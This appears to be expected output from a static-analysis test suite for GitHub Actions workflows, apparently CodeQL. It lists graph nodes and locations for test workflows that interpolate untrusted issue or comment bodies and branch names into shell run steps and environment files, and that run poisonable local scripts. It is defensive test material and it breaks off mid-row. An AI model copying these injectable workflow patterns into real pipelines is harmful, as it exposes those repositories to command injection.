.github/workflows/poisonable_steps.yml:1:1:46:111 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| 
.github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:1:1:22:32 | enter on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push | +| .github/workflows/shell.yml:1:1:22:32 | exit on: push (normal) | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| 
.github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +dfNodes +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| 
.github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| 
.github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| 
.github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| 
.github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| 
.github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| 
.github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| 
.github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| 
.github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:9:5:31:2 | .github/workflows/commands.yml@9:5:31:2 | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:9:18:6 | .github/workflows/commands.yml@15:9:18:6 | +| .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | .github/workflows/commands.yml:16:14:17:30 | .github/workflows/commands.yml@16:14:17:30 | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:9:20:6 | 
.github/workflows/commands.yml@18:9:20:6 | +| .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | .github/workflows/commands.yml:18:14:19:30 | .github/workflows/commands.yml@18:14:19:30 | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:9:22:6 | .github/workflows/commands.yml@20:9:22:6 | +| .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | .github/workflows/commands.yml:20:14:21:33 | .github/workflows/commands.yml@20:14:21:33 | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:9:24:6 | .github/workflows/commands.yml@22:9:24:6 | +| .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | .github/workflows/commands.yml:22:14:23:31 | .github/workflows/commands.yml@22:14:23:31 | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:9:26:6 | .github/workflows/commands.yml@24:9:26:6 | +| .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | .github/workflows/commands.yml:24:14:25:32 | .github/workflows/commands.yml@24:14:25:32 | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:9:28:6 | .github/workflows/commands.yml@26:9:28:6 | +| .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | .github/workflows/commands.yml:26:14:27:34 | .github/workflows/commands.yml@26:14:27:34 | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:9:31:2 | .github/workflows/commands.yml@28:9:31:2 | +| .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | .github/workflows/commands.yml:28:14:29:50 | .github/workflows/commands.yml@28:14:29:50 | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | .github/workflows/commands.yml:32:5:39:30 | .github/workflows/commands.yml@32:5:39:30 | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | 
.github/workflows/commands.yml:34:9:37:6 | .github/workflows/commands.yml@34:9:37:6 | +| .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | .github/workflows/commands.yml:35:14:36:30 | .github/workflows/commands.yml@35:14:36:30 | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:9:39:30 | .github/workflows/commands.yml@37:9:39:30 | +| .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | .github/workflows/commands.yml:38:14:39:30 | .github/workflows/commands.yml@38:14:39:30 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | 
.github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | 